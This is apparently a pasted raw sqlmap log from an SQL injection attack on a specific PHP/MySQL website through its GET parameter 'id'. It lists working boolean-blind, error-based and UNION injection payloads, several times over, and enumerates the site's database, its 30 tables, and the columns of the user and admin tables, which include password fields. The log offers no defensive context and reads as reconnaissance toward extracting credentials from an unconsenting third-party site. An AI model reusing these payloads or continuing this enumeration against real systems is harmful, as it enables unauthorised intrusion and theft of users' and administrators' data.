- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_users
- [18 columns]
- +----------------------+---------------+
- | Column | Type |
- +----------------------+---------------+
- | address | text |
- | city | varchar(255) |
- | company_name | varchar(255) |
- | country | varchar(255) |
- | credit_for_net | varchar(255) |
- | display_order | int(11) |
- | first_name | varchar(255) |
- | is_credit_customer | enum('0','1') |
- | join_date | date |
- | last_name | varchar(255) |
- | newsletter_subscribe | enum('0','1') |
- | post_code | varchar(255) |
- | province_state | varchar(255) |
- | telephone | varchar(255) |
- | user_email | varchar(255) |
- | user_id | int(11) |
- | user_password | varchar(255) |
- | user_status | tinyint(4) |
- +----------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- [30 tables]
- +----------------------------+
- | icd_addresses |
- | icd_basic_pages |
- | icd_category |
- | icd_contactus_entries |
- | icd_courses |
- | icd_download_category |
- | icd_events |
- | icd_faqs |
- | icd_featured_ads |
- | icd_footer_info |
- | icd_gallery_images |
- | icd_header_info |
- | icd_home_welcome |
- | icd_homepage_banner |
- | icd_media_coverage_videos |
- | icd_members |
- | icd_membership |
- | icd_online_enquiries |
- | icd_practitioner_directory |
- | icd_quick_links |
- | icd_social_media |
- | icd_tbl_admin |
- | icd_tbl_country |
- | icd_tbl_mysql_code |
- | icd_tbl_subscribers |
- | icd_tbl_templates |
- | icd_testimonials |
- | icd_upload_files |
- | icd_users |
- | icd_videos |
- +----------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_tbl_mysql_code
- [3 columns]
- +--------------+--------------+
- | Column | Type |
- +--------------+--------------+
- | fErrorDetail | varchar(100) |
- | fErrorID | int(11) |
- | fErrorNumber | varchar(20) |
- +--------------+--------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- [30 tables]
- +----------------------------+
- | icd_addresses |
- | icd_basic_pages |
- | icd_category |
- | icd_contactus_entries |
- | icd_courses |
- | icd_download_category |
- | icd_events |
- | icd_faqs |
- | icd_featured_ads |
- | icd_footer_info |
- | icd_gallery_images |
- | icd_header_info |
- | icd_home_welcome |
- | icd_homepage_banner |
- | icd_media_coverage_videos |
- | icd_members |
- | icd_membership |
- | icd_online_enquiries |
- | icd_practitioner_directory |
- | icd_quick_links |
- | icd_social_media |
- | icd_tbl_admin |
- | icd_tbl_country |
- | icd_tbl_mysql_code |
- | icd_tbl_subscribers |
- | icd_tbl_templates |
- | icd_testimonials |
- | icd_upload_files |
- | icd_users |
- | icd_videos |
- +----------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_tbl_admin
- [8 columns]
- +---------------------------+---------------+
- | Column | Type |
- +---------------------------+---------------+
- | fEmail | varchar(255) |
- | fPassword | varchar(255) |
- | fStatus | tinyint(2) |
- | fUserID | int(11) |
- | fUserName | varchar(20) |
- | last_login | datetime |
- | super_admin | enum('0','1') |
- | user_reply_email_contents | text |
- +---------------------------+---------------+
Add Comment
Please, Sign In to add comment